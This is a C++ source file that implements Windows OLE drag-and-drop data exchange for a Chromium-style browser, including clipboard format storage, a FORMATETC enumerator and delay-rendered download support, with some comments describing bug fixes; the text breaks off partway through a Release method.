// Creates a new STGMEDIUM object to hold the specified text. The caller
// owns the resulting object. The "Bytes" version does not NULL terminate, the
// string version does.
static STGMEDIUM* GetStorageForBytes(const char* data, size_t bytes);
static STGMEDIUM* GetStorageForString16(const string16& data);
static STGMEDIUM* GetStorageForString(const std::string& data);
// Creates the contents of an Internet Shortcut file for the given URL.
static void GetInternetShortcutFileContents(const GURL& url, std::string* data);
// Creates a valid file name given a suggested title and URL.
static void CreateValidFileNameFromTitle(const GURL& url,
const string16& title,
string16* validated);
// Creates a new STGMEDIUM object to hold a file.
static STGMEDIUM* GetStorageForFileName(const FilePath& path);
// Creates a File Descriptor for the creation of a file to the given URL and
// returns a handle to it.
static STGMEDIUM* GetStorageForFileDescriptor(const FilePath& path);
///////////////////////////////////////////////////////////////////////////////
// FormatEtcEnumerator
//
// This object implements an enumeration interface. The existence of an
// implementation of this interface is exposed to clients through
// OSExchangeData's EnumFormatEtc method. Our implementation is nobody's
// business but our own, so it lives in this file.
//
// This Windows API is truly a gem. It wants to be an enumerator but assumes
// some sort of sequential data (why not just use an array?). See comments
// throughout.
//
class FormatEtcEnumerator : public IEnumFORMATETC {
 public:
  // Deep-copies the FORMATETCs of [begin, end) into |contents_|.
  FormatEtcEnumerator(DataObjectImpl::StoredData::const_iterator begin,
                      DataObjectImpl::StoredData::const_iterator end);
  ~FormatEtcEnumerator();
  // IEnumFORMATETC implementation:
  HRESULT __stdcall Next(
      ULONG count, FORMATETC* elements_array, ULONG* elements_fetched);
  HRESULT __stdcall Skip(ULONG skip_count);
  HRESULT __stdcall Reset();
  HRESULT __stdcall Clone(IEnumFORMATETC** clone);
  // IUnknown implementation:
  HRESULT __stdcall QueryInterface(const IID& iid, void** object);
  ULONG __stdcall AddRef();
  ULONG __stdcall Release();
 private:
  // This can only be called from |CloneFromOther|, since it initializes the
  // contents_ from the other enumerator's contents.
  FormatEtcEnumerator() : cursor_(0), ref_count_(0) {
  }
  // Clone a new FormatEtc from another instance of this enumeration.
  static FormatEtcEnumerator* CloneFromOther(const FormatEtcEnumerator* other);
 private:
  // We are _forced_ to use a vector as our internal data model as Windows'
  // retarded IEnumFORMATETC API assumes a deterministic ordering of elements
  // through methods like Next and Skip. This exposes the underlying data
  // structure to the user. Bah.
  std::vector<FORMATETC*> contents_;
  // The cursor of the active enumeration - an index into |contents_|.
  size_t cursor_;
  // COM-style reference count, manipulated atomically in AddRef/Release.
  LONG ref_count_;
  DISALLOW_COPY_AND_ASSIGN(FormatEtcEnumerator);
};
// Safely makes a copy of all of the relevant bits of a FORMATETC object.
// When |source->ptd| is set, the target-device descriptor is duplicated into
// a fresh CoTaskMemAlloc allocation owned by |clone| so the two structs do
// not alias each other's DVTARGETDEVICE.
static void CloneFormatEtc(FORMATETC* source, FORMATETC* clone) {
  *clone = *source;
  if (source->ptd) {
    // BUG FIX: the new allocation must be assigned to |clone->ptd|. The old
    // code wrote it to |source->ptd| — after the struct copy above both
    // pointers aliased the same buffer, so the clone kept pointing at the
    // source's DVTARGETDEVICE while the source's pointer was replaced with
    // an allocation whose contents were then copied from itself
    // (uninitialized), leaking the original buffer's ownership semantics.
    clone->ptd =
        static_cast<DVTARGETDEVICE*>(CoTaskMemAlloc(sizeof(DVTARGETDEVICE)));
    *(clone->ptd) = *(source->ptd);
  }
}
// Deep-copies each FORMATETC from [start, end) into |contents_|; the
// enumeration cursor starts at the beginning.
FormatEtcEnumerator::FormatEtcEnumerator(
    DataObjectImpl::StoredData::const_iterator start,
    DataObjectImpl::StoredData::const_iterator end)
    // FIX: initialize members in declaration order (cursor_ precedes
    // ref_count_ in the class); the old list was reversed, which triggers
    // -Wreorder and misleads readers about actual initialization order.
    : cursor_(0), ref_count_(0) {
  // Copy FORMATETC data from our source into ourselves.
  for (; start != end; ++start) {
    FORMATETC* format_etc = new FORMATETC;
    CloneFormatEtc(&(*start)->format_etc, format_etc);
    contents_.push_back(format_etc);
  }
}
FormatEtcEnumerator::~FormatEtcEnumerator() {
  // Frees the FORMATETCs we deep-copied in the constructor / CloneFromOther.
  STLDeleteContainerPointers(contents_.begin(), contents_.end());
}
STDMETHODIMP FormatEtcEnumerator::Next(
    ULONG count, FORMATETC* elements_array, ULONG* elements_fetched) {
  // MSDN says |elements_fetched| is allowed to be NULL if count is 1.
  if (!elements_fetched)
    DCHECK_EQ(count, 1ul);
  // This method copies count elements into |elements_array|.
  ULONG index = 0;
  while (cursor_ < contents_.size() && index < count) {
    CloneFormatEtc(contents_[cursor_], &elements_array[index]);
    ++cursor_;
    ++index;
  }
  // The out param is for how many we actually copied.
  if (elements_fetched)
    *elements_fetched = index;
  // If the two don't agree, then we fail.
  return index == count ? S_OK : S_FALSE;
}
STDMETHODIMP FormatEtcEnumerator::Skip(ULONG skip_count) {
  cursor_ += skip_count;
  // MSDN implies it's OK to leave the enumerator trashed.
  // "Whatever you say, boss"
  return cursor_ <= contents_.size() ? S_OK : S_FALSE;
}
STDMETHODIMP FormatEtcEnumerator::Reset() {
  // Rewind the enumeration to the first element.
  cursor_ = 0;
  return S_OK;
}
STDMETHODIMP FormatEtcEnumerator::Clone(IEnumFORMATETC** clone) {
  // Clone the current enumerator in its exact state, including cursor.
  FormatEtcEnumerator* e = CloneFromOther(this);
  e->AddRef();
  *clone = e;
  return S_OK;
}
STDMETHODIMP FormatEtcEnumerator::QueryInterface(const IID& iid,
                                                 void** object) {
  *object = NULL;
  if (IsEqualIID(iid, IID_IUnknown) || IsEqualIID(iid, IID_IEnumFORMATETC)) {
    *object = this;
  } else {
    return E_NOINTERFACE;
  }
  AddRef();
  return S_OK;
}
ULONG FormatEtcEnumerator::AddRef() {
  return InterlockedIncrement(&ref_count_);
}
ULONG FormatEtcEnumerator::Release() {
  if (InterlockedDecrement(&ref_count_) == 0) {
    // Copy the count before |this| is destroyed so we don't read a freed
    // member when returning.
    ULONG copied_refcnt = ref_count_;
    delete this;
    return copied_refcnt;
  }
  return ref_count_;
}
// static
// Builds a new enumerator that is an exact deep copy of |other|, including
// the current cursor position. Returned with a zero ref count; the caller
// (Clone) AddRefs it.
FormatEtcEnumerator* FormatEtcEnumerator::CloneFromOther(
    const FormatEtcEnumerator* other) {
  FormatEtcEnumerator* e = new FormatEtcEnumerator;
  // Copy FORMATETC data from our source into ourselves.
  std::vector<FORMATETC*>::const_iterator start = other->contents_.begin();
  while (start != other->contents_.end()) {
    FORMATETC* format_etc = new FORMATETC;
    CloneFormatEtc(*start, format_etc);
    e->contents_.push_back(format_etc);
    ++start;
  }
  // Carry over the cursor so the clone resumes where |other| left off.
  e->cursor_ = other->cursor_;
  return e;
}
///////////////////////////////////////////////////////////////////////////////
// OSExchangeDataProviderWin, public:
// static
// True if |source| carries plain text that parses as a valid URL.
bool OSExchangeDataProviderWin::HasPlainTextURL(IDataObject* source) {
  string16 plain_text;
  return (ClipboardUtil::GetPlainText(source, &plain_text) &&
          !plain_text.empty() && GURL(plain_text).is_valid());
}
// static
// Extracts a valid URL from |source|'s plain text, if present.
bool OSExchangeDataProviderWin::GetPlainTextURL(IDataObject* source,
                                                GURL* url) {
  string16 plain_text;
  if (ClipboardUtil::GetPlainText(source, &plain_text) &&
      !plain_text.empty()) {
    GURL gurl(plain_text);
    if (gurl.is_valid()) {
      *url = gurl;
      return true;
    }
  }
  return false;
}
// static
DataObjectImpl* OSExchangeDataProviderWin::GetDataObjectImpl(
    const OSExchangeData& data) {
  return static_cast<const OSExchangeDataProviderWin*>(&data.provider())->
      data_.get();
}
// static
IDataObject* OSExchangeDataProviderWin::GetIDataObject(
    const OSExchangeData& data) {
  return static_cast<const OSExchangeDataProviderWin*>(&data.provider())->
      data_object();
}
// static
IDataObjectAsyncCapability* OSExchangeDataProviderWin::GetIAsyncOperation(
    const OSExchangeData& data) {
  return static_cast<const OSExchangeDataProviderWin*>(&data.provider())->
      async_operation();
}
// Wraps an externally-supplied IDataObject (e.g. from an inbound drag).
OSExchangeDataProviderWin::OSExchangeDataProviderWin(IDataObject* source)
    : data_(new DataObjectImpl()),
      source_object_(source) {
}
// Creates a provider backed by our own DataObjectImpl (outbound drag).
OSExchangeDataProviderWin::OSExchangeDataProviderWin()
    : data_(new DataObjectImpl()),
      source_object_(data_.get()) {
}
OSExchangeDataProviderWin::~OSExchangeDataProviderWin() {
}
// Stores |data| as both CF_UNICODETEXT and CF_TEXT.
void OSExchangeDataProviderWin::SetString(const string16& data) {
  STGMEDIUM* storage = GetStorageForString16(data);
  data_->contents_.push_back(
      new DataObjectImpl::StoredDataInfo(CF_UNICODETEXT, storage));
  // Also add plain text.
  storage = GetStorageForString(UTF16ToUTF8(data));
  data_->contents_.push_back(
      new DataObjectImpl::StoredDataInfo(CF_TEXT, storage));
}
// Stores |url| (and |title|) in every clipboard format consumers expect:
// text/x-moz-url, an Internet Shortcut file, UniformResourceLocator(W), and
// plain/Unicode text. The insertion order below is load-bearing — see NOTE.
void OSExchangeDataProviderWin::SetURL(const GURL& url,
                                       const string16& title) {
  // NOTE WELL:
  // Every time you change the order of the first two CLIPFORMATS that get
  // added here, you need to update the EnumerationViaCOM test case in
  // the _unittest.cc file to reflect the new arrangement otherwise that test
  // will fail! It assumes an insertion order.
  // Add text/x-moz-url for drags from Firefox
  string16 x_moz_url_str = UTF8ToUTF16(url.spec());
  x_moz_url_str += '\n';
  x_moz_url_str += title;
  STGMEDIUM* storage = GetStorageForString16(x_moz_url_str);
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetMozUrlFormat()->cfFormat, storage));
  // Add a .URL shortcut file for dragging to Explorer.
  string16 valid_file_name;
  CreateValidFileNameFromTitle(url, title, &valid_file_name);
  std::string shortcut_url_file_contents;
  GetInternetShortcutFileContents(url, &shortcut_url_file_contents);
  SetFileContents(FilePath(valid_file_name), shortcut_url_file_contents);
  // Add a UniformResourceLocator link for apps like IE and Word.
  storage = GetStorageForString16(UTF8ToUTF16(url.spec()));
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetUrlWFormat()->cfFormat, storage));
  storage = GetStorageForString(url.spec());
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetUrlFormat()->cfFormat, storage));
  // TODO(beng): add CF_HTML.
  // http://code.google.com/p/chromium/issues/detail?id=6767
  // Also add text representations (these should be last since they're the
  // least preferable).
  storage = GetStorageForString16(UTF8ToUTF16(url.spec()));
  data_->contents_.push_back(
      new DataObjectImpl::StoredDataInfo(CF_UNICODETEXT, storage));
  storage = GetStorageForString(url.spec());
  data_->contents_.push_back(
      new DataObjectImpl::StoredDataInfo(CF_TEXT, storage));
}
// Stores a single file path as CF_HDROP.
void OSExchangeDataProviderWin::SetFilename(const FilePath& path) {
  STGMEDIUM* storage = GetStorageForFileName(path);
  DataObjectImpl::StoredDataInfo* info =
      new DataObjectImpl::StoredDataInfo(CF_HDROP, storage);
  data_->contents_.push_back(info);
}
// Stores each file path as its own CF_HDROP entry.
void OSExchangeDataProviderWin::SetFilenames(
    const std::vector<OSExchangeData::FileInfo>& filenames) {
  for (size_t i = 0; i < filenames.size(); ++i) {
    STGMEDIUM* storage = GetStorageForFileName(filenames[i].path);
    DataObjectImpl::StoredDataInfo* info =
        new DataObjectImpl::StoredDataInfo(CF_HDROP, storage);
    data_->contents_.push_back(info);
  }
}
// Stores an opaque Pickle payload under a caller-chosen clipboard format.
void OSExchangeDataProviderWin::SetPickledData(CLIPFORMAT format,
                                               const Pickle& data) {
  STGMEDIUM* storage = GetStorageForBytes(static_cast<const char*>(data.data()),
                                          data.size());
  data_->contents_.push_back(
      new DataObjectImpl::StoredDataInfo(format, storage));
}
// Stores a virtual file as the CFSTR_FILEDESCRIPTOR / CFSTR_FILECONTENTS
// format pair used by Explorer for file drops.
void OSExchangeDataProviderWin::SetFileContents(
    const FilePath& filename,
    const std::string& file_contents) {
  // Add CFSTR_FILEDESCRIPTOR
  STGMEDIUM* storage = GetStorageForFileDescriptor(filename);
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetFileDescriptorFormat()->cfFormat, storage));
  // Add CFSTR_FILECONTENTS
  storage = GetStorageForBytes(file_contents.data(), file_contents.length());
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetFileContentFormatZero(), storage));
}
// Stores markup both as MS CF_HTML (UTF-8, with CF_HTML headers) and as raw
// text/html.
void OSExchangeDataProviderWin::SetHtml(const string16& html,
                                        const GURL& base_url) {
  // Add both MS CF_HTML and text/html format.  CF_HTML should be in utf-8.
  std::string utf8_html = UTF16ToUTF8(html);
  std::string url = base_url.is_valid() ? base_url.spec() : std::string();
  std::string cf_html = ClipboardUtil::HtmlToCFHtml(utf8_html, url);
  STGMEDIUM* storage = GetStorageForBytes(cf_html.c_str(), cf_html.size());
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetHtmlFormat()->cfFormat, storage));
  STGMEDIUM* storage_plain = GetStorageForBytes(utf8_html.c_str(),
                                                utf8_html.size());
  data_->contents_.push_back(new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetTextHtmlFormat()->cfFormat, storage_plain));
}
bool OSExchangeDataProviderWin::GetString(string16* data) const {
  return ClipboardUtil::GetPlainText(source_object_, data);
}
// Extracts a URL (and title) from the data object. Prefers a dedicated URL
// format; falls back to parsing the plain-text payload, in which case the
// title is synthesized from the URL's suggested filename.
bool OSExchangeDataProviderWin::GetURLAndTitle(GURL* url,
                                               string16* title) const {
  string16 url_str;
  bool success = ClipboardUtil::GetUrl(source_object_, &url_str, title, true);
  if (success) {
    GURL test_url(url_str);
    if (test_url.is_valid()) {
      *url = test_url;
      return true;
    }
    // Note: a URL format that fails GURL validation falls through to
    // "return false" below without trying the plain-text fallback.
  } else if (GetPlainTextURL(source_object_, url)) {
    if (url->is_valid())
      *title = net::GetSuggestedFilename(*url, "", "", "", "", std::string());
    else
      title->clear();
    return true;
  }
  return false;
}
// Retrieves the first filename from the data object's file list, if any.
// Returns true and fills |path| on success.
bool OSExchangeDataProviderWin::GetFilename(FilePath* path) const {
  std::vector<string16> filenames;
  if (!ClipboardUtil::GetFilenames(source_object_, &filenames))
    return false;
  // ROBUSTNESS FIX: guard against a successful call yielding an empty list;
  // the old code indexed filenames[0] unconditionally, which is undefined
  // behavior on an empty vector.
  if (filenames.empty())
    return false;
  *path = FilePath(filenames[0]);
  return true;
}
// Returns every filename in the data object, converted to FileInfo entries
// (the display-name half of each FileInfo is left empty).
bool OSExchangeDataProviderWin::GetFilenames(
    std::vector<OSExchangeData::FileInfo>* filenames) const {
  std::vector<string16> filenames_local;
  bool success = ClipboardUtil::GetFilenames(source_object_, &filenames_local);
  if (success) {
    for (size_t i = 0; i < filenames_local.size(); ++i)
      filenames->push_back(
          OSExchangeData::FileInfo(FilePath(filenames_local[i]), FilePath()));
  }
  return success;
}
// Reads a custom-format HGLOBAL payload and deserializes it into a Pickle.
// The STGMEDIUM obtained from GetData is always released before returning.
bool OSExchangeDataProviderWin::GetPickledData(CLIPFORMAT format,
                                               Pickle* data) const {
  DCHECK(data);
  FORMATETC format_etc =
      { format, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };
  bool success = false;
  STGMEDIUM medium;
  if (SUCCEEDED(source_object_->GetData(&format_etc, &medium))) {
    if (medium.tymed & TYMED_HGLOBAL) {
      base::win::ScopedHGlobal<char> c_data(medium.hGlobal);
      DCHECK_GT(c_data.Size(), 0u);
      *data = Pickle(c_data.get(), static_cast<int>(c_data.Size()));
      success = true;
    }
    ReleaseStgMedium(&medium);
  }
  return success;
}
// Retrieves a file-contents transfer: the suggested file name and the raw
// bytes of the file.
bool OSExchangeDataProviderWin::GetFileContents(
    FilePath* filename,
    std::string* file_contents) const {
  string16 filename_str;
  if (!ClipboardUtil::GetFileContents(source_object_, &filename_str,
                                      file_contents)) {
    return false;
  }
  *filename = FilePath(filename_str);
  return true;
}
// Retrieves the HTML payload plus the base URL it should be resolved against.
bool OSExchangeDataProviderWin::GetHtml(string16* html,
                                        GURL* base_url) const {
  std::string url;
  bool success = ClipboardUtil::GetHtml(source_object_, html, &url);
  if (success)
    *base_url = GURL(url);
  return success;
}
// Lightweight presence checks used to decide which Get*() calls can succeed.
bool OSExchangeDataProviderWin::HasString() const {
  return ClipboardUtil::HasPlainText(source_object_);
}
bool OSExchangeDataProviderWin::HasURL() const {
  // A URL may be present either in the dedicated URL format or as a
  // plain-text payload that parses as a URL.
  return (ClipboardUtil::HasUrl(source_object_) ||
          HasPlainTextURL(source_object_));
}
bool OSExchangeDataProviderWin::HasFile() const {
  return ClipboardUtil::HasFilenames(source_object_);
}
bool OSExchangeDataProviderWin::HasFileContents() const {
  return ClipboardUtil::HasFileContents(source_object_);
}
bool OSExchangeDataProviderWin::HasHtml() const {
  return ClipboardUtil::HasHtml(source_object_);
}
bool OSExchangeDataProviderWin::HasCustomFormat(CLIPFORMAT format) const {
  // Ask the source object directly whether it can render |format|.
  FORMATETC format_etc =
      { format, NULL, DVASPECT_CONTENT, -1, TYMED_HGLOBAL };
  return (source_object_->QueryGetData(&format_etc) == S_OK);
}
// Registers a CF_HDROP entry backed by |download|. When no filename is known
// yet, the storage is left NULL so delay rendering kicks in and the data is
// produced (downloaded) only when the drop target actually asks for it.
void OSExchangeDataProviderWin::SetDownloadFileInfo(
    const OSExchangeData::DownloadFileInfo& download) {
  // If the filename is not provided, set storage to NULL to indicate that
  // the delay rendering will be used.
  STGMEDIUM* storage = NULL;
  if (!download.filename.empty())
    storage = GetStorageForFileName(download.filename);
  // Add CF_HDROP.
  DataObjectImpl::StoredDataInfo* info = new DataObjectImpl::StoredDataInfo(
      ClipboardUtil::GetCFHDropFormat()->cfFormat, storage);
  info->downloader = download.downloader;
  data_->contents_.push_back(info);
}
#if defined(USE_AURA)
// Drag-image accessors; only compiled into Aura builds.
void OSExchangeDataProviderWin::SetDragImage(
    const gfx::ImageSkia& image,
    const gfx::Vector2d& cursor_offset) {
  drag_image_ = image;
  drag_image_offset_ = cursor_offset;
}
const gfx::ImageSkia& OSExchangeDataProviderWin::GetDragImage() const {
  return drag_image_;
}
const gfx::Vector2d& OSExchangeDataProviderWin::GetDragImageOffset() const {
  return drag_image_offset_;
}
#endif
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, IDataObject implementation:
// The following function, DuplicateMedium, is derived from WCDataObject.cpp
// in the WebKit source code. This is the license information for the file:
/*
* Copyright (C) 2007 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
// Deep-copies |source| into |destination| according to its storage type:
// handle-based payloads (HGLOBAL, metafiles, bitmaps, file names) are
// duplicated via OleDuplicateData, while stream/storage interfaces are
// shared by taking an extra reference.
static void DuplicateMedium(CLIPFORMAT source_clipformat,
                            STGMEDIUM* source,
                            STGMEDIUM* destination) {
  switch (source->tymed) {
    case TYMED_HGLOBAL:
      destination->hGlobal =
          static_cast<HGLOBAL>(OleDuplicateData(
              source->hGlobal, source_clipformat, 0));
      break;
    case TYMED_MFPICT:
      destination->hMetaFilePict =
          static_cast<HMETAFILEPICT>(OleDuplicateData(
              source->hMetaFilePict, source_clipformat, 0));
      break;
    case TYMED_GDI:
      destination->hBitmap =
          static_cast<HBITMAP>(OleDuplicateData(
              source->hBitmap, source_clipformat, 0));
      break;
    case TYMED_ENHMF:
      destination->hEnhMetaFile =
          static_cast<HENHMETAFILE>(OleDuplicateData(
              source->hEnhMetaFile, source_clipformat, 0));
      break;
    case TYMED_FILE:
      destination->lpszFileName =
          static_cast<LPOLESTR>(OleDuplicateData(
              source->lpszFileName, source_clipformat, 0));
      break;
    case TYMED_ISTREAM:
      destination->pstm = source->pstm;
      destination->pstm->AddRef();
      break;
    case TYMED_ISTORAGE:
      destination->pstg = source->pstg;
      destination->pstg->AddRef();
      break;
  }
  destination->tymed = source->tymed;
  // Keep the release object alive for the duplicate as well.
  destination->pUnkForRelease = source->pUnkForRelease;
  if (destination->pUnkForRelease)
    destination->pUnkForRelease->AddRef();
}
DataObjectImpl::DataObjectImpl()
    : is_aborting_(false),
      in_async_mode_(false),
      async_operation_started_(false),
      observer_(NULL) {
}
// Stops any in-flight downloads, frees the stored format entries and
// notifies the observer that this data object is going away.
DataObjectImpl::~DataObjectImpl() {
  StopDownloads();
  STLDeleteContainerPointers(contents_.begin(), contents_.end());
  if (observer_)
    observer_->OnDataObjectDisposed();
}
// Cancels and detaches the downloader of every stored entry that has one.
void DataObjectImpl::StopDownloads() {
  for (StoredData::iterator iter = contents_.begin();
       iter != contents_.end(); ++iter) {
    if ((*iter)->downloader.get()) {
      (*iter)->downloader->Stop();
      (*iter)->downloader = 0;
    }
  }
}
// Removes the first stored entry matching |format| on format, aspect, index
// and medium. Requests carrying a target device are ignored.
void DataObjectImpl::RemoveData(const FORMATETC& format) {
  if (format.ptd)
    return;  // Don't attempt to compare target devices.
  for (StoredData::iterator i = contents_.begin(); i != contents_.end(); ++i) {
    if (!(*i)->format_etc.ptd &&
        format.cfFormat == (*i)->format_etc.cfFormat &&
        format.dwAspect == (*i)->format_etc.dwAspect &&
        format.lindex == (*i)->format_etc.lindex &&
        format.tymed == (*i)->format_etc.tymed) {
      delete *i;
      contents_.erase(i);
      return;
    }
  }
}
// Download-finished callback: swaps the CF_HDROP entry's storage for one
// naming the freshly downloaded file, so a pending GetData can complete.
void DataObjectImpl::OnDownloadCompleted(const FilePath& file_path) {
  CLIPFORMAT hdrop_format = ClipboardUtil::GetCFHDropFormat()->cfFormat;
  DataObjectImpl::StoredData::iterator iter = contents_.begin();
  for (; iter != contents_.end(); ++iter) {
    if ((*iter)->format_etc.cfFormat == hdrop_format) {
      // Release the old storage.
      if ((*iter)->owns_medium) {
        ReleaseStgMedium((*iter)->medium);
        delete (*iter)->medium;
      }
      // Update the storage.
      (*iter)->owns_medium = true;
      (*iter)->medium = GetStorageForFileName(file_path);
      break;
    }
  }
  DCHECK(iter != contents_.end());
}
void DataObjectImpl::OnDownloadAborted() {
  // Intentionally empty: an aborted download simply leaves the
  // delay-rendered entry without final data.
}
// Core IDataObject::GetData implementation with delay-rendering support.
// If a matching entry has concrete storage, it is duplicated into |medium|.
// If the entry's storage is NULL (delay rendering), the method either defers
// (while the left mouse button is still down and/or an async operation has
// not started) or blocks on the downloader and then recurses to hand out the
// freshly produced data.
HRESULT DataObjectImpl::GetData(FORMATETC* format_etc, STGMEDIUM* medium) {
  if (is_aborting_)
    return DV_E_FORMATETC;
  StoredData::iterator iter = contents_.begin();
  while (iter != contents_.end()) {
    if ((*iter)->format_etc.cfFormat == format_etc->cfFormat &&
        (*iter)->format_etc.lindex == format_etc->lindex &&
        ((*iter)->format_etc.tymed & format_etc->tymed)) {
      // If medium is NULL, delay-rendering will be used.
      if ((*iter)->medium) {
        DuplicateMedium((*iter)->format_etc.cfFormat, (*iter)->medium, medium);
      } else {
        // Check if the left button is down.
        bool is_left_button_down = (GetKeyState(VK_LBUTTON) & 0x8000) != 0;
        bool wait_for_data = false;
        if ((*iter)->in_delay_rendering) {
          // Make sure the left button is up. Sometimes the drop target, like
          // Shell, might be too aggresive in calling GetData when the left
          // button is not released.
          if (is_left_button_down)
            return DV_E_FORMATETC;
          // In async mode, we do not want to start waiting for the data before
          // the async operation is started. This is because we want to postpone
          // until Shell kicks off a background thread to do the work so that
          // we do not block the UI thread.
          if (!in_async_mode_ || async_operation_started_)
            wait_for_data = true;
        } else {
          // If the left button is up and the target has not requested the data
          // yet, it probably means that the target does not support delay-
          // rendering. So instead, we wait for the data.
          if (is_left_button_down) {
            (*iter)->in_delay_rendering = true;
            memset(medium, 0, sizeof(STGMEDIUM));
          } else {
            wait_for_data = true;
          }
        }
        if (!wait_for_data)
          return DV_E_FORMATETC;
        // Notify the observer we start waiting for the data. This gives
        // an observer a chance to end the drag and drop.
        if (observer_)
          observer_->OnWaitForData();
        // Now we can start the download.
        if ((*iter)->downloader.get()) {
          (*iter)->downloader->Start(this);
          if (!(*iter)->downloader->Wait()) {
            is_aborting_ = true;
            return DV_E_FORMATETC;
          }
        }
        // The stored data should have been updated with the final version.
        // So we just need to call this function again to retrieve it.
        return GetData(format_etc, medium);
      }
      return S_OK;
    }
    ++iter;
  }
  return DV_E_FORMATETC;
}
// Caller-allocated-medium retrieval is not supported.
HRESULT DataObjectImpl::GetDataHere(FORMATETC* format_etc,
                                    STGMEDIUM* medium) {
  return DATA_E_FORMATETC;
}
// Reports S_OK when any stored entry matches the requested clipboard format.
// Note: only cfFormat is compared here; aspect/medium are ignored.
HRESULT DataObjectImpl::QueryGetData(FORMATETC* format_etc) {
  StoredData::const_iterator iter = contents_.begin();
  while (iter != contents_.end()) {
    if ((*iter)->format_etc.cfFormat == format_etc->cfFormat)
      return S_OK;
    ++iter;
  }
  return DV_E_FORMATETC;
}
// No canonical format translation is provided; clears the target device as
// the contract requires and reports not-implemented.
HRESULT DataObjectImpl::GetCanonicalFormatEtc(
    FORMATETC* format_etc, FORMATETC* result) {
  format_etc->ptd = NULL;
  return E_NOTIMPL;
}
// Stores a copy of (or, when |should_release| is set, takes ownership of)
// |medium| under |format_etc|, replacing any previous entry for the format.
HRESULT DataObjectImpl::SetData(
    FORMATETC* format_etc, STGMEDIUM* medium, BOOL should_release) {
  RemoveData(*format_etc);
  STGMEDIUM* local_medium = new STGMEDIUM;
  if (should_release) {
    *local_medium = *medium;
  } else {
    DuplicateMedium(format_etc->cfFormat, medium, local_medium);
  }
  DataObjectImpl::StoredDataInfo* info =
      new DataObjectImpl::StoredDataInfo(format_etc->cfFormat, local_medium);
  info->medium->tymed = format_etc->tymed;
  info->owns_medium = !!should_release;
  // Make newly added data appear first.
  contents_.insert(contents_.begin(), info);
  return S_OK;
}
// Only enumeration of the formats available for GetData is supported.
HRESULT DataObjectImpl::EnumFormatEtc(
    DWORD direction, IEnumFORMATETC** enumerator) {
  if (direction == DATADIR_GET) {
    FormatEtcEnumerator* e =
        new FormatEtcEnumerator(contents_.begin(), contents_.end());
    e->AddRef();
    *enumerator = e;
    return S_OK;
  }
  return E_NOTIMPL;
}
// Advise sinks are not supported by this data object.
HRESULT DataObjectImpl::DAdvise(
    FORMATETC* format_etc, DWORD advf, IAdviseSink* sink, DWORD* connection) {
  return OLE_E_ADVISENOTSUPPORTED;
}
HRESULT DataObjectImpl::DUnadvise(DWORD connection) {
  return OLE_E_ADVISENOTSUPPORTED;
}
HRESULT DataObjectImpl::EnumDAdvise(IEnumSTATDATA** enumerator) {
  return OLE_E_ADVISENOTSUPPORTED;
}
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, IDataObjectAsyncCapability implementation:
// Called by the drop target when its asynchronous extraction has finished.
HRESULT DataObjectImpl::EndOperation(
    HRESULT result, IBindCtx* reserved, DWORD effects) {
  async_operation_started_ = false;
  return S_OK;
}
HRESULT DataObjectImpl::GetAsyncMode(BOOL* is_op_async) {
  *is_op_async = in_async_mode_ ? TRUE : FALSE;
  return S_OK;
}
HRESULT DataObjectImpl::InOperation(BOOL* in_async_op) {
  *in_async_op = async_operation_started_ ? TRUE : FALSE;
  return S_OK;
}
HRESULT DataObjectImpl::SetAsyncMode(BOOL do_op_async) {
  in_async_mode_ = (do_op_async == TRUE);
  return S_OK;
}
// Called by the drop target when it kicks off asynchronous extraction;
// GetData consults this flag before blocking on delayed data.
HRESULT DataObjectImpl::StartOperation(IBindCtx* reserved) {
  async_operation_started_ = true;
  return S_OK;
}
///////////////////////////////////////////////////////////////////////////////
// DataObjectImpl, IUnknown implementation:
HRESULT DataObjectImpl::QueryInterface(const IID& iid, void** object) {
  if (!object)
    return E_POINTER;
  if (IsEqualIID(iid, IID_IDataObject) || IsEqualIID(iid, IID_IUnknown)) {
    *object = static_cast<IDataObject*>(this);
  } else if (in_async_mode_ &&
             IsEqualIID(iid, __uuidof(IDataObjectAsyncCapability))) {
    // The async-capability interface is only exposed while async mode is on.
    *object = static_cast<IDataObjectAsyncCapability*>(this);
  } else {
    *object = NULL;
    return E_NOINTERFACE;
  }
  AddRef();
  return S_OK;
}
// Reference counting is delegated to the RefCountedThreadSafe base; the ULONG
// returned to COM callers is diagnostic only, so a constant 0 is returned.
ULONG DataObjectImpl::AddRef() {
  base::RefCountedThreadSafe<DownloadFileObserver>::AddRef();
  return 0;
}
ULONG DataObjectImpl::Release() {
